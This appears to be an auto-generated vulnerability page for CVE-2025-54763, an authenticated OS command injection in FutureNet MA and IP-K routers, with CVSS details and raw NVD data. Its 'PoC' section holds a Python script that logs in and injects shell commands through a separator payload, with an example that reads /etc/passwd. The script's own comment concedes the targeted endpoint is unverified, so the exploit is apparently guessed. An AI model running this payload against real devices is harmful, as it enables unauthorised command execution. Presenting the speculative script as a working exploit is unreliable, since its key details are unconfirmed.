Security Vulnerability Report
中文
CVE-2025-54763 CVSS 7.2 HIGH

CVE-2025-54763

Published: 2025-10-31 06:15:34
Last Modified: 2026-04-15 00:35:42

Description

FutureNet MA and IP-K series provided by Century Systems Co., Ltd. contain an OS command Injection vulnerability. A user who logs in to the Web UI of the product may execute an arbitrary OS command.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FutureNet MA series (all versions prior to vendor patch)
FutureNet IP-K series (all versions prior to vendor patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-54763 PoC - FutureNet MA/IP-K OS Command Injection Author: [email protected] Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys def exploit_cve_2025_54763(target_url, username, password, cmd="id"): """ Exploit OS command injection in FutureNet MA/IP-K Web UI. Args: target_url: Base URL of the target device username: Valid admin username password: Valid admin password cmd: Command to execute on the target system Returns: Command output from the target system """ session = requests.Session() # Step 1: Login to get authenticated session login_url = f"{target_url}/login" login_data = { "username": username, "password": password } try: response = session.post(login_url, data=login_data, timeout=10) # Step 2: Inject OS command via vulnerable parameter # The exact vulnerable endpoint and parameter needs verification vuln_url = f"{target_url}/cgi-bin/admin/system/command" # Payload: inject command using command separator payload = { "command": f";{cmd}", # or use |, &&, $(cmd) etc. "action": "execute" } response = session.post(vuln_url, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Command executed successfully: {cmd}") print(f"[+] Response: {response.text}") return response.text else: print(f"[-] Exploitation failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <command>") print(f"Example: {sys.argv[0]} http://192.168.1.1 admin admin123 'cat /etc/passwd'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] command = sys.argv[4] exploit_cve_2025_54763(target, user, passwd, command)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54763", "sourceIdentifier": "[email protected]", "published": "2025-10-31T06:15:33.573", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FutureNet MA and IP-K series provided by Century Systems Co., Ltd. contain an OS command Injection vulnerability. A user who logs in to the Web UI of the product may execute an arbitrary OS command."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU98191201/", "source": "[email protected]"}, {"url": "https://www.centurysys.co.jp/backnumber/common/jvnvu98191201.html", "source": "[email protected]"}]}}